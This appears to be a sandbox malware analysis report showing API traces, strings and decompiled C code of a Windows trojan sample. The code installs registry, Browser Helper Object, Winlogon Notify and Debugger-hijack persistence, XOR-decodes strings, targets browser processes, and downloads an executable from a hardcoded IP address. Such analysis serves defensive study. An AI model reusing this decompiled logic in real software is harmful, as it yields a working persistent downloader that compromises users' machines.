SetFileAttributesA.KERNEL32(00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000,?,?,00000000,00000000,00000000,?,80000000), ref: 00404EAE
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000), ref: 00404EC6
WriteFile.KERNEL32(?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104), ref: 00404EFC
SetFileTime.KERNEL32(?,?,?,?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404F27
CloseHandle.KERNEL32(?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080), ref: 00404F33
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000), ref: 00404F78
ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?), ref: 00404FB0
lstrcat.KERNEL32(?,00000080), ref: 00404FC1
SetFileAttributesA.KERNEL32(00000000,?,00000080,%AppData%\,?,00000104,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?), ref: 00404FC7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?,40000000,00000000), ref: 00404FDF
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?,40000000,00000000), ref: 00404FF6
GetTempPathA.KERNEL32(00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?), ref: 00405006
lstrcat.KERNEL32(?,00000080), ref: 00405017
SetFileAttributesA.KERNEL32(00000000,?,00000080,00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\), ref: 0040501D
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104,?,?,40000000,00000000,00000000), ref: 00405035
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104,?,?,40000000,00000000,00000000), ref: 0040504C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040507B
ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00405092
lstrcat.KERNEL32(?,00000080), ref: 004050A3
SetFileAttributesA.KERNEL32(00000000,?,00000080,%AppData%\,?,00000104,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004050A9
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?,80000000,00000001), ref: 004050C1
GetTempPathA.KERNEL32(00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\,?,00000104,?), ref: 004050E5
lstrcat.KERNEL32(?,00000080), ref: 004050F6
SetFileAttributesA.KERNEL32(00000000,?,00000080,00000104,?,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,%AppData%\), ref: 004050FC
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104,?,?,40000000,00000000,00000000), ref: 00405114
WriteFile.KERNEL32(00000000,00408840,00005E00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104), ref: 00405140
CloseHandle.KERNEL32(?,00000000,00408840,00005E00,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080), ref: 0040514C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040517C
GetSystemDirectoryA.KERNEL32 ref: 0040518E
lstrcat.KERNEL32(?,0041103E), ref: 00405199
ExpandEnvironmentStringsA.KERNEL32(%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 004051B0
ExpandEnvironmentStringsA.KERNEL32(%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 004051C7
RegOpenKeyExA.ADVAPI32(80000002,00407220,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 004051FE
RegOpenKeyExA.ADVAPI32(80000001,00407220,00000000,00020006,?,80000002,00407220,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104), ref: 00405220
lstrlen.KERNEL32(?,80000002,00407220,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?,00000104), ref: 00405244
RegSetValueExA.ADVAPI32(?,00000000,00000001,?,00000001,?,80000002,00407220,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?), ref: 0040525D
RegDeleteValueA.ADVAPI32(?,winrnt.exe,80000002,00407220,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E,?), ref: 0040526E
RegCloseKey.ADVAPI32(?,?,winrnt.exe,80000002,00407220,00000000,00020006,?,%AppData%\,?,00000104,%CommonProgramFiles%\System\,?,00000104,?,0041103E), ref: 0040527A
RegCreateKeyA.ADVAPI32(80000002,004071E0,?), ref: 004052C2
RegSetValueExA.ADVAPI32(?,004071C3,00000000,00000004,?,00000004,80000002,004071E0,?,?,?,winrnt.exe,80000002,00407220,00000000,00020006), ref: 004052E5
RegCloseKey.ADVAPI32(?,?,004071C3,00000000,00000004,?,00000004,80000002,004071E0,?,?,?,winrnt.exe,80000002,00407220,00000000), ref: 004052F1
RegOpenKeyExA.ADVAPI32(80000002,004071A0,00000000,00020006,?,80000002,004071E0,?,?,?,winrnt.exe,80000002,00407220,00000000,00020006,?), ref: 00405362
RegSetValueExA.ADVAPI32(?,00407177,00000000,00000004,?,00000004,80000002,004071A0,00000000,00020006,?,80000002,004071E0,?,?,?), ref: 00405385
RegSetValueExA.ADVAPI32(?,00407160,00000000,00000004,?,00000004,?,00407177,00000000,00000004,?,00000004,80000002,004071A0,00000000,00020006), ref: 0040539D
RegSetValueExA.ADVAPI32(?,0040714A,00000000,00000004,?,00000004,?,00407160,00000000,00000004,?,00000004,?,00407177,00000000,00000004), ref: 004053B5
RegSetValueExA.ADVAPI32(?,00407135,00000000,00000004,?,00000004,?,0040714A,00000000,00000004,?,00000004,?,00407160,00000000,00000004), ref: 004053CD
RegCloseKey.ADVAPI32(?,?,00407135,00000000,00000004,?,00000004,?,0040714A,00000000,00000004,?,00000004,?,00407160,00000000), ref: 004053D9
RegOpenKeyExA.ADVAPI32(80000002,004070C0,00000000,0002001F,?,80000002,004071A0,00000000,00020006,?,80000002,004071E0,?,?,?,winrnt.exe), ref: 00405402
RegEnumValueA.ADVAPI32(?,40000000,00000000,?,00000000,00000000,00004000,00004000,80000002,004070C0,00000000,0002001F,?,80000002,004071A0,00000000), ref: 004054AB
wsprintfA.USER32 ref: 004054C2
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000001,00000003,00000000,00000000), ref: 004054D9
RegCloseKey.ADVAPI32(?,?,?,00000000,00000001,00000000,00000001,00000003,00000000,00000000), ref: 004054EC
CreateThread.KERNEL32 ref: 00405509
CloseHandle.KERNEL32(00000000,00000000,00010000,Function_0000265F,00000002,00000000,?,?,?,winrnt.exe,80000002,00407220,00000000,00020006,?,%AppData%\), ref: 0040550F
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,0002001F,00000000,00000002,00000000,00000000,00000000,00010000,Function_0000265F,00000002,00000000,?), ref: 00405583
GetSystemTimeAsFileTime.KERNEL32(00000000,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,0002001F,00000000,00000002,00000000,00000000,00000000,00010000,Function_0000265F,00000002,00000000), ref: 00405595
RegQueryValueExA.ADVAPI32(?,ConnPred,00000000,00000000,00000000,00000008,00000000,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,0002001F,00000000,00000002,00000000), ref: 004055BF

Strings

%CommonProgramFiles%\System\, xrefs: 004051AB
explorer.exe, xrefs: 00404F5D
%AppData%\, xrefs: 0040508D, 004051C2
tmp, xrefs: 00404DD1
winlogon.exe, xrefs: 00404F42
kernel32.dll, xrefs: 00404F6D

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$Create$Value$Close$lstrcat$Attributes$EnvironmentExpandHandleOpenStringsTemp$ErrorLastPathSystemTimeWrite$Directory$DeleteEnumNameQueryThreadlstrlenwsprintf
String ID: %AppData%\$%CommonProgramFiles%\System\$explorer.exe$kernel32.dll$tmp$winlogon.exe
API String ID: 673231081-3579377401
Opcode ID: 4e855ec33d0ceb2612a926de5c85e617f6f3ba52014d6bd10d8ca8ace089c697
Instruction ID: fbe2660df193cff3e18baa874fd9eb54c314e199f9e988dc3fb1dd516a992f0b
Opcode Fuzzy Hash: 4e855ec33d0ceb2612a926de5c85e617f6f3ba52014d6bd10d8ca8ace089c697
Instruction Fuzzy Hash: 6B7193B0784745B9E630A6618C4BFDB228DAF44B48F50493F73C5B90C2DAFCA5448B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040457B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 233
stringregistryfileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040457B() {
				int _t330;
				signed char* _t349;
				int _t352;
				void* _t354;
				int _t355;
				int _t356;
				void* _t360;
				int _t361;
				int _t362;
				CHAR* _t365;
				int _t367;
				long _t368;
				CHAR* _t369;
				int _t371;
				long _t372;
				CHAR* _t377;
				void* _t379;
				CHAR* _t380;
				void* _t382;
				char* _t392;
				int _t393;
				signed char* _t398;
				int _t401;
				int _t402;
				int _t408;
				int _t409;
				int _t414;
				int _t419;
				int _t421;
				void* _t423;
				int _t427;
				void* _t429;
				int _t434;
				long _t438;
				int _t439;
				int _t445;
				int _t447;
				int _t450;
				int _t457;
				int _t459;
				int _t461;
				int _t466;
				int _t469;
				int _t471;
				int _t474;
				int _t476;
				void* _t480;
				int _t485;
				int _t487;
				int _t489;
				int _t493;
				void* _t494;
				void* _t496;
				char* _t497;
				char* _t498;
				int _t499;
				char* _t500;
				char* _t501;
				char* _t502;
				char* _t503;
				char* _t504;
				int _t505;
				char* _t506;
				int _t507;
				char* _t509;
				CHAR* _t510;
				int _t514;
				int _t516;
				int _t519;
				void* _t533;
				int _t534;
				int _t537;
				CHAR* _t543;
				int _t545;
				long _t546;
				int _t551;
				int _t559;
				int _t560;
				signed char _t568;
				int _t574;
				int _t578;
				void* _t580;
				int _t581;
				void* _t584;
				signed char _t595;
				int _t596;
				signed char* _t597;
				void* _t598;
				void* _t600;
				int _t605;
				void* _t607;
				void* _t608;
				int* _t609;
				signed int* _t612;
				long _t622;
				int _t623;
				signed char _t633;
				void* _t636;
				int _t637;
				CHAR* _t638;
				void* _t639;
				void* _t641;
				int _t644;
				void* _t646;
				void* _t647;
				void* _t648;
				signed int* _t651;
				void* _t660;
				int _t661;
				signed char _t671;
				CHAR* _t674;
				char* _t675;
				CHAR* _t676;
				CHAR* _t677;
				CHAR* _t678;
				CHAR* _t679;
				CHAR* _t680;
				CHAR* _t681;
				CHAR* _t682;
				int* _t683;
				void** _t684;
				char* _t685;
				char* _t686;
				CHAR* _t687;
				int _t690;
				char* _t691;
				char* _t693;
				char* _t694;
				char* _t695;
				int* _t696;
				CHAR* _t697;
				int _t698;
				CHAR* _t699;
				CHAR* _t700;
				void* _t701;
				signed int* _t703;
				char* _t704;
				void* _t705;
				CHAR* _t706;
				CHAR* _t707;
				void* _t708;
				signed int* _t710;
				char* _t711;
				signed char _t712;
				int* _t716;
				int* _t717;
				int _t718;
				int _t720;
				int _t721;
				void* _t722;
				signed int* _t746;
				signed char* _t747;
				signed char* _t748;
				signed int* _t750;
				signed int* _t753;
				char* _t755;
				signed char* _t756;
				void* _t757;
				void* _t758;
				signed int* _t759;
				void** _t760;
				int _t762;
				void** _t763;
				void** _t764;
				char* _t765;
				CHAR* _t766;
				signed char* _t767;
				int* _t768;
				signed int* _t769;
				void* _t770;
				void* _t771;
				char* _t772;
				signed int* _t773;
				void* _t774;
				char* _t775;
				signed int* _t776;
				long _t777;
				struct _FILETIME* _t778;
				void* _t779;
				int* _t780;

				if(RegCreateKeyA(0x80000002, 0x408720, _t779 + 0x98) != 0) {
					L24:
					 *(_t779 + 0x78) = 0x10;
					_t674 = _t779 + 0x1ec;
					_t330 = GetComputerNameA(_t674, _t779 + 0x78);
					__eflags = _t330;
					if(_t330 == 0) {
						L26:
						_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
						_push(_t779 + 0x1bc);
						L00405E20();
						L30:
						wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t779 + 0x1f4)),  *((char*)(_t779 + 0x1f1)),  *((char*)(_t779 + 0x1ee)),  *((char*)(_t779 + 0x1eb)),  *((char*)(_t779 + 0x1e8)),  *((char*)(_t779 + 0x1e5)),  *((char*)(_t779 + 0x1e2)),  *((char*)(_t779 + 0x1df)),  *((char*)(_t779 + 0x1dc)),  *((char*)(_t779 + 0x1d9)),  *((char*)(_t779 + 0x1d6)),  *((char*)(_t779 + 0x1d3)),  *((char*)(_t779 + 0x1d0)),  *((char*)(_t779 + 0x1cd)),  *((char*)(_t779 + 0x1ca)),  *((char*)(_t779 + 0x1c7)));
						_t780 = _t779 + 0x48;
						_t349 = 0x407aa0;
						while(1) {
							__eflags = _t349 - 0x407ad5;
							if(_t349 >= 0x407ad5) {
								break;
							}
							 *_t349 =  *_t349 ^ 0x000000d4;
							_t349 =  &(_t349[1]);
						}
						while(1) {
							__eflags = 0x4072a0 - 0x407aa0;
							if(0x4072a0 >= 0x407aa0) {
								break;
							}
							 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
							__eflags =  *0x4072a0;
							 *(_t777 + 0x40) =  *(_t777 + 0x40) ^ _t712;
						}
						_push(0x4122b0);
						_push(0x407aa0);
						_t675 =  &(_t780[0x410]);
						_push(_t675);
						L00405E20();
						_push(0x4072a0);
						L00405E30();
						_t352 = RegCreateKeyA(0x80000002, _t675,  &(_t780[0x26]));
						__eflags = _t352;
						if(_t352 != 0) {
							L61:
							_t354 = E004030DE( &(_t780[0x1ee]));
							_t780[0x26] = _t354;
							__eflags = _t354;
							if(_t354 == 0) {
								L81:
								_t355 = E004010B2();
								__eflags = _t355;
								_t720 = _t355;
								if(_t355 == 0) {
									_t720 = 0x42;
								}
								_t780[0x1ee] = _t720;
								_t356 = E004010B2();
								__eflags = _t356;
								_t721 = _t356;
								if(_t356 == 0) {
									_t721 = 0x4d;
								}
								_t780[0x162] = _t721;
								_push( *0x4120b0);
								_push( &(_t780[0x163]));
								L00405E20();
								_push( &(_t780[0x55a]));
								_push( &(_t780[0x1ac]));
								L00405E20();
								_t759 = _t780[5];
								_t360 = _t759 + _t777;
								while(1) {
									__eflags = _t759 - _t360;
									if(_t759 >= _t360) {
										break;
									}
									 *_t759 =  *_t759 ^ _t780[0x162] & 0x000000ff;
									_t759 =  &(_t759[0]);
									_t360 = _t780[5] + _t777;
								}
								_t676 =  &(_t780[0x517]);
								_t361 = ExpandEnvironmentStringsA("%AppData%\\", _t676, 0x104);
								__eflags = _t361;
								if(_t361 == 0) {
									L92:
									_t677 =  &(_t780[0x516]);
									_t362 = GetTempPathA(0x104, _t677);
									__eflags = _t362;
									if(_t362 == 0) {
										L100:
										E00401029(_t780[5]);
										_t678 =  &(_t780[0x387]);
										_t365 = GetSystemDirectoryA(_t678, 0x104);
										_push(0x80);
										_push( *0x4120c0);
										_push(0x41103e);
										_push(_t678);
										L00405E30();
										L00405E30();
										SetFileAttributesA(_t365, _t365);
										_t367 = CreateFileA(_t678, 0x40000000, 0, 0, 2, 0x80, 0);
										_t780[0x28] = _t367;
										__eflags = _t367;
										if(_t367 == 0) {
											L107:
											_t368 = GetLastError();
											__eflags = _t368 - 0x20;
											if(_t368 != 0x20) {
												_t679 =  &(_t780[0x387]);
												_t369 = ExpandEnvironmentStringsA("%AppData%\\", _t679, 0x104);
												_push(0x80);
												_push( *0x4120c0);
												L00405E30();
												SetFileAttributesA(_t369, _t679);
												_t371 = CreateFileA(_t679, 0x40000000, 0, 0, 2, 0x80, 0);
												_t780[0x28] = _t371;
												__eflags = _t371;
												if(_t371 == 0) {
													L111:
													_t372 = GetLastError();
													__eflags = _t372 - 0x20;
													if(_t372 == 0x20) {
														goto L108;
													}
													_t543 = GetTempPathA(0x104, _t679);
													_push(0x80);
													_push( *0x4120c0);
													L00405E30();
													SetFileAttributesA(_t543, _t679);
													_t545 = CreateFileA(_t679, 0x40000000, 0, 0, 2, 0x80, 0);
													_t780[0x28] = _t545;
													__eflags = _t545;
													if(_t545 == 0) {
														L114:
														_t546 = GetLastError();
														__eflags = _t546 - 0x20;
														if(_t546 == 0x20) {
															goto L108;
														}
														L117:
														_t680 =  &(_t780[0x343]);
														_t377 = ExpandEnvironmentStringsA("%AppData%\\", _t680, 0x104);
														_push(0x80);
														_push( *0x4120d0);
														L00405E30();
														SetFileAttributesA(_t377, _t680);
														_t379 = CreateFileA(_t680, 0x40000000, 0, 0, 2, 0x80, 0);
														_t780[0x28] = _t379;
														__eflags = _t379;
														_t722 = _t379;
														if(_t379 == 0) {
															L119:
															_t681 =  &(_t780[0x342]);
															_t380 = GetTempPathA(0x104, _t681);
															_push(0x80);
															_push( *0x4120d0);
															L00405E30();
															SetFileAttributesA(_t380, _t681);
															_t382 = CreateFileA(_t681, 0x40000000, 0, 0, 2, 0x80, 0);
															_t780[0x28] = _t382;
															__eflags = _t382;
															_t722 = _t382;
															if(_t382 == 0) {
																L122:
																_t780[0x342] = 0;
																L123:
																__eflags = _t780[0x342];
																if(_t780[0x342] != 0) {
																	CreateFileA( &(_t780[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																}
																_t682 =  &(_t780[0x2b]);
																GetSystemDirectoryA(_t682, 0x104);
																_push(0x41103e);
																_push(_t682);
																L00405E30();
																E004012C2(_t682);
																ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t682, 0x104);
																E004012C2(_t682);
																ExpandEnvironmentStringsA("%AppData%\\", _t682, 0x104);
																E004012C2(_t682);
																_t392 = 0x407220;
																while(1) {
																	__eflags = _t392 - 0x40724d;
																	if(_t392 >= 0x40724d) {
																		break;
																	}
																	 *_t392 =  *_t392 ^ 0x000000d4;
																	_t392 =  &(_t392[1]);
																}
																_t393 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t780[0x26]));
																__eflags = _t393;
																if(_t393 == 0) {
																	L130:
																	__eflags = _t780[0xb];
																	if(_t780[0xb] == 0) {
																		_t695 =  &(_t780[0x55a]);
																		_t533 = E00401251(_t780[0x26]);
																		_push(_t695);
																		L00405E40();
																		_t534 = _t533 + 1;
																		__eflags = _t534;
																		RegSetValueExA(_t780[0x2b],  *0x4120b0, 0, 1, _t695, _t534);
																	}
																	RegDeleteValueA(_t780[0x27], "winrnt.exe");
																	RegCloseKey(_t780[0x26]);
																	L133:
																	__eflags =  *0x412100 - 2;
																	if( *0x412100 != 2) {
																		L173:
																		CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t780[0x27])));
																		_t398 = 0x407000;
																		while(1) {
																			__eflags = _t398 - 0x407060;
																			if(_t398 >= 0x407060) {
																				break;
																			}
																			 *_t398 =  *_t398 ^ 0x000000d4;
																			_t398 =  &(_t398[1]);
																		}
																		_t780[0xc] = 0;
																		while(1) {
																			E004011CF(0x80000002, 0x407000);
																			__eflags = _t780[0xc] - 9;
																			if(_t780[0xc] <= 9) {
																				goto L212;
																			}
																			_t780[0x16] = 0;
																			_t780[0x17] = 0;
																			_t457 = E004025C3();
																			__eflags = _t457;
																			if(_t457 != 0) {
																				L209:
																				 *_t780 = 0;
																				L213:
																				_t780[0xd] = 0x3b;
																				do {
																					__eflags = _t780[0x342];
																					if(_t780[0x342] != 0) {
																						_push(0);
																						_push("opera.exe");
																						_push("seamonkey.exe");
																						_push("mozilla.exe");
																						_push("firefox.exe");
																						_push("iexplore.exe");
																						_push("explorer.exe");
																						E0040318D( &(_t780[0x349]));
																						_t780 =  &(_t780[8]);
																					}
																					__eflags = _t780[0xa];
																					if(_t780[0xa] != 0) {
																						_t686 =  &(_t780[0x3cb]);
																						SetFileAttributesA(_t686, 0x21);
																						_t434 = RegCreateKeyA(0x80000002,  &(_t780[0x40f]),  &(_t780[0x26]));
																						__eflags = _t434;
																						if(_t434 == 0) {
																							E00401251(_t780[0x26]);
																							_t780[0x27] = 1;
																							_t438 = RegSetValueExA(_t780[0x2b], "IsInstalled", 0, 4,  &(_t780[0x28]), 4);
																							_push(_t686);
																							L00405E40();
																							_t439 = _t438 + 1;
																							__eflags = _t439;
																							RegSetValueExA(_t780[0x2b], "StubPath", 0, 1, _t686, _t439);
																							RegCloseKey(_t780[0x26]);
																						}
																					}
																					__eflags = _t780[0xb];
																					_t760 =  &(_t780[0x26]);
																					if(_t780[0xb] == 0) {
																						_t401 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t760);
																						__eflags = _t401;
																						if(_t401 == 0) {
																							L224:
																							_t683 =  &(_t780[0x55a]);
																							_push(_t683);
																							L00405E40();
																							_t402 = _t401 + 1;
																							__eflags = _t402;
																							_push(_t402);
																							_push(_t683);
																							_push(1);
																							_push(0);
																							_push( *0x4120b0);
																							goto L225;
																						}
																						_t401 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t760);
																						__eflags = _t401;
																						if(_t401 != 0) {
																							goto L226;
																						}
																						goto L224;
																					} else {
																						_t687 =  &(_t780[0x48f]);
																						SetFileAttributesA(_t687, 0x21);
																						_t408 = RegCreateKeyA(0x80000002, 0x408720, _t760);
																						__eflags = _t408;
																						if(_t408 != 0) {
																							L226:
																							__eflags = _t780[9];
																							if(_t780[9] == 0) {
																								goto L236;
																							}
																							_t684 =  &(_t780[0x27]);
																							_t409 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t684, 0);
																							__eflags = _t409;
																							if(_t409 == 0) {
																								L229:
																								RegSetValueExA(_t780[0x2b], "SubshellState", 0, 3,  &(_t780[0x1ef]), 0x22a);
																								RegCloseKey(_t780[0x26]);
																								L230:
																								_t685 =  &(_t780[0x387]);
																								SetFileAttributesA(_t685, 0x21);
																								__eflags =  *0x412100 - 2;
																								_t763 =  &(_t780[0x26]);
																								if( *0x412100 != 2) {
																									_t414 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t763);
																									__eflags = _t414;
																									if(_t414 != 0) {
																										goto L236;
																									}
																									_push(_t685);
																									L00405E40();
																									RegSetValueExA(_t780[0x2b], 0, 0, 1, _t685, _t414 + 1);
																									RegSetValueExA(_t780[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																									RegCloseKey(_t780[0x26]);
																									_t419 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t763);
																									__eflags = _t419;
																									if(_t419 != 0) {
																										goto L236;
																									}
																									L235:
																									RegCloseKey(_t780[0x26]);
																									goto L236;
																								}
																								_t421 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t763);
																								__eflags = _t421;
																								if(_t421 != 0) {
																									goto L236;
																								}
																								_t423 = E00401251(_t780[0x26]);
																								_push(_t685);
																								L00405E40();
																								RegSetValueExA(_t780[0x2b], "DLLName", 0, 1, _t685, _t423 + 1);
																								RegSetValueExA(_t780[0x2b], "Startup", 0, 1, "Startup", 8);
																								goto L235;
																							}
																							_t427 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t684, 0);
																							__eflags = _t427;
																							if(_t427 != 0) {
																								goto L230;
																							}
																							goto L229;
																						}
																						_t429 = E00401251(_t780[0x26]);
																						_push(_t687);
																						L00405E40();
																						_push(_t429 + 1);
																						_push(_t687);
																						_push(1);
																						_push(0);
																						_push("Debugger");
																						L225:
																						RegSetValueExA(_t780[0x2b], ??, ??, ??, ??, ??);
																						RegCloseKey(_t780[0x26]);
																						goto L226;
																					}
																					L236:
																					SetFileAttributesA( &(_t780[0x55b]), 0x21);
																					Sleep(0x3e8);
																					_t314 =  &(_t780[0xd]);
																					 *_t314 = _t780[0xd] - 1;
																					__eflags =  *_t314;
																				} while ( *_t314 >= 0);
																				_t445 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t780[0x12]), 0);
																				__eflags = _t445;
																				if(_t445 == 0) {
																					_t780[0x10] = 4;
																					_t691 =  &(_t780[0x10]);
																					_t447 = RegQueryValueExA(_t780[0x16], "g00d d0gg", 0, 0, _t691,  &(_t780[0x10]));
																					__eflags = _t447;
																					if(_t447 == 0) {
																						_t450 = _t780[0xf] - 1;
																						__eflags = _t450;
																						_t780[0xf] = _t450;
																						if(_t450 == 0) {
																							RegDeleteValueA(_t780[0x12], "g00d d0gg");
																							Sleep(0x1388);
																							__eflags =  *0x412100 - 2;
																							if( *0x412100 != 2) {
																								ExitWindowsEx(6, 0);
																							} else {
																								RtlAdjustPrivilege(0x13, 1, 0,  &(_t780[0xe]));
																								 *0x412240(1);
																							}
																						} else {
																							RegSetValueExA(_t780[0x16], "g00d d0gg", 0, 4, _t691, 4);
																						}
																					}
																					RegCloseKey(_t780[0x11]);
																				}
																				continue;
																			}
																			_t459 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t780[0x1c]), 0);
																			__eflags = _t459;
																			if(_t459 != 0) {
																				__eflags =  *_t780;
																				if( *_t780 == 0) {
																					goto L213;
																				}
																				L211:
																				_t780[0xc] = 0;
																				goto L213;
																			}
																			_t778 =  &(_t780[0x19]);
																			GetSystemTimeAsFileTime(_t778);
																			_t780[0x18] = 8;
																			_t755 =  &(_t780[0x17]);
																			_t461 = RegQueryValueExA(_t780[0x20], "ConnPred", 0,  &(_t780[0x17]), _t755,  &(_t780[0x18]));
																			__eflags = _t461;
																			if(_t461 != 0) {
																				L182:
																				__eflags = E004014D8(_t778, 0x412070) - 0x4af;
																				if(__eflags <= 0) {
																					L193:
																					__eflags =  *0x412080;
																					if( *0x412080 == 0) {
																						L196:
																						_t780[0x18] = 8;
																						__eflags = RegQueryValueExA(_t780[0x20], "UseExtProfile", 0,  &(_t780[0x17]), _t755,  &(_t780[0x18]));
																						if(__eflags != 0) {
																							L198:
																							_t466 = E00402427(__eflags);
																							__eflags = _t466;
																							if(_t466 != 0) {
																								L208:
																								RegCloseKey(_t780[0x1b]);
																								goto L209;
																							}
																							_push(1);
																							_push(0);
																							_t469 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																							__eflags = _t469;
																							if(_t469 == 0) {
																								L201:
																								_t780[0x18] = 8;
																								_t689 =  &(_t780[0x13]);
																								_t471 = RegQueryValueExA(_t780[0x20], "UseDflProfile", 0,  &(_t780[0x17]),  &(_t780[0x13]),  &(_t780[0x18]));
																								__eflags = _t471;
																								if(_t471 != 0) {
																									_t480 = _t780[0x16] + 0x1162f100;
																									__eflags = _t480;
																									asm("adc edx, 0xffffff9b");
																									_t780[0x12] = _t480;
																									_t780[0x13] = _t780[0x17];
																								}
																								__eflags = E004014D8( &(_t780[0x19]), _t689) - 0x152ab;
																								if(__eflags <= 0) {
																									goto L208;
																								} else {
																									_t474 = E00402427(__eflags);
																									__eflags = _t474;
																									if(_t474 != 0) {
																										goto L208;
																									}
																									_push(3);
																									_push(0);
																									_t476 = E0040211B("tombul.gif", 0);
																									__eflags = _t476;
																									if(_t476 == 0) {
																										goto L208;
																									}
																									_push(8);
																									_push(_t778);
																									_push(0xb);
																									_push(0);
																									_push("UseDflProfile");
																									L207:
